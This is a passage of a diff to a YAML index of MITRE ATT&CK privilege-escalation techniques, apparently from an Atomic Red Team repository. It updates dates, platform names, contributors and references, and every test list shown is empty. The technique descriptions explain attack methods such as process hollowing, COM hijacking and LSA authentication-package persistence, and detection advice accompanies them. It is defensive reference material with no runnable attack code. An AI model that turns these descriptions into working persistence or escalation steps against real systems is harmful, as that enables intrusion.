       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1574:
@@ -20994,7 +21305,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -21068,11 +21378,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -21089,7 +21398,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -21099,7 +21407,7 @@ privilege-escalation:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -21108,19 +21416,17 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -21168,11 +21474,12 @@ privilege-escalation:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.012:
     technique:
-      modified: '2023-08-11T21:37:00.009Z'
+      modified: '2024-09-12T15:11:45.602Z'
       name: 'Process Injection: Process Hollowing'
       description: "Adversaries may inject malicious code into suspended and hollowed
         processes in order to evade process-based defenses. Process hollowing is a
@@ -21240,23 +21547,22 @@ privilege-escalation:
           Retrieved December 7, 2017.'
         url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
       - source_name: Leitch Hollowing
-        description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
-          2014.
-        url: http://www.autosectools.com/process-hollowing.pdf
+        description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+          2024.
+        url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
       - source_name: Mandiant Endpoint Evading 2019
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.012
     atomic_tests: []
   T1068:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-04-07T17:13:54.168Z'
       name: Exploitation for Privilege Escalation
       description: |-
         Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
@@ -21319,11 +21625,10 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -21376,8 +21681,8 @@ privilege-escalation:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -21425,78 +21730,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -21544,6 +21782,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -21554,9 +21796,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -21565,8 +21811,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1134.005:
@@ -21612,7 +21917,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21637,13 +21942,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21723,7 +22026,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -21759,7 +22061,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21782,12 +22084,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -21865,12 +22166,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -21931,7 +22231,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -21975,7 +22274,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -21997,7 +22296,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -22078,7 +22376,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -22101,7 +22398,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -22131,12 +22428,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22221,7 +22516,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -22286,7 +22580,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -22361,7 +22654,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22389,7 +22682,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -22420,7 +22712,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22463,12 +22755,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22485,7 +22775,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -22544,7 +22834,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -22626,12 +22915,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22728,7 +23016,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -22842,7 +23129,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -22912,7 +23198,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -22940,7 +23225,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -22984,8 +23269,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -23021,7 +23304,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -23040,12 +23323,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -23095,12 +23377,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23133,9 +23414,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -23152,9 +23434,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -23200,38 +23481,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
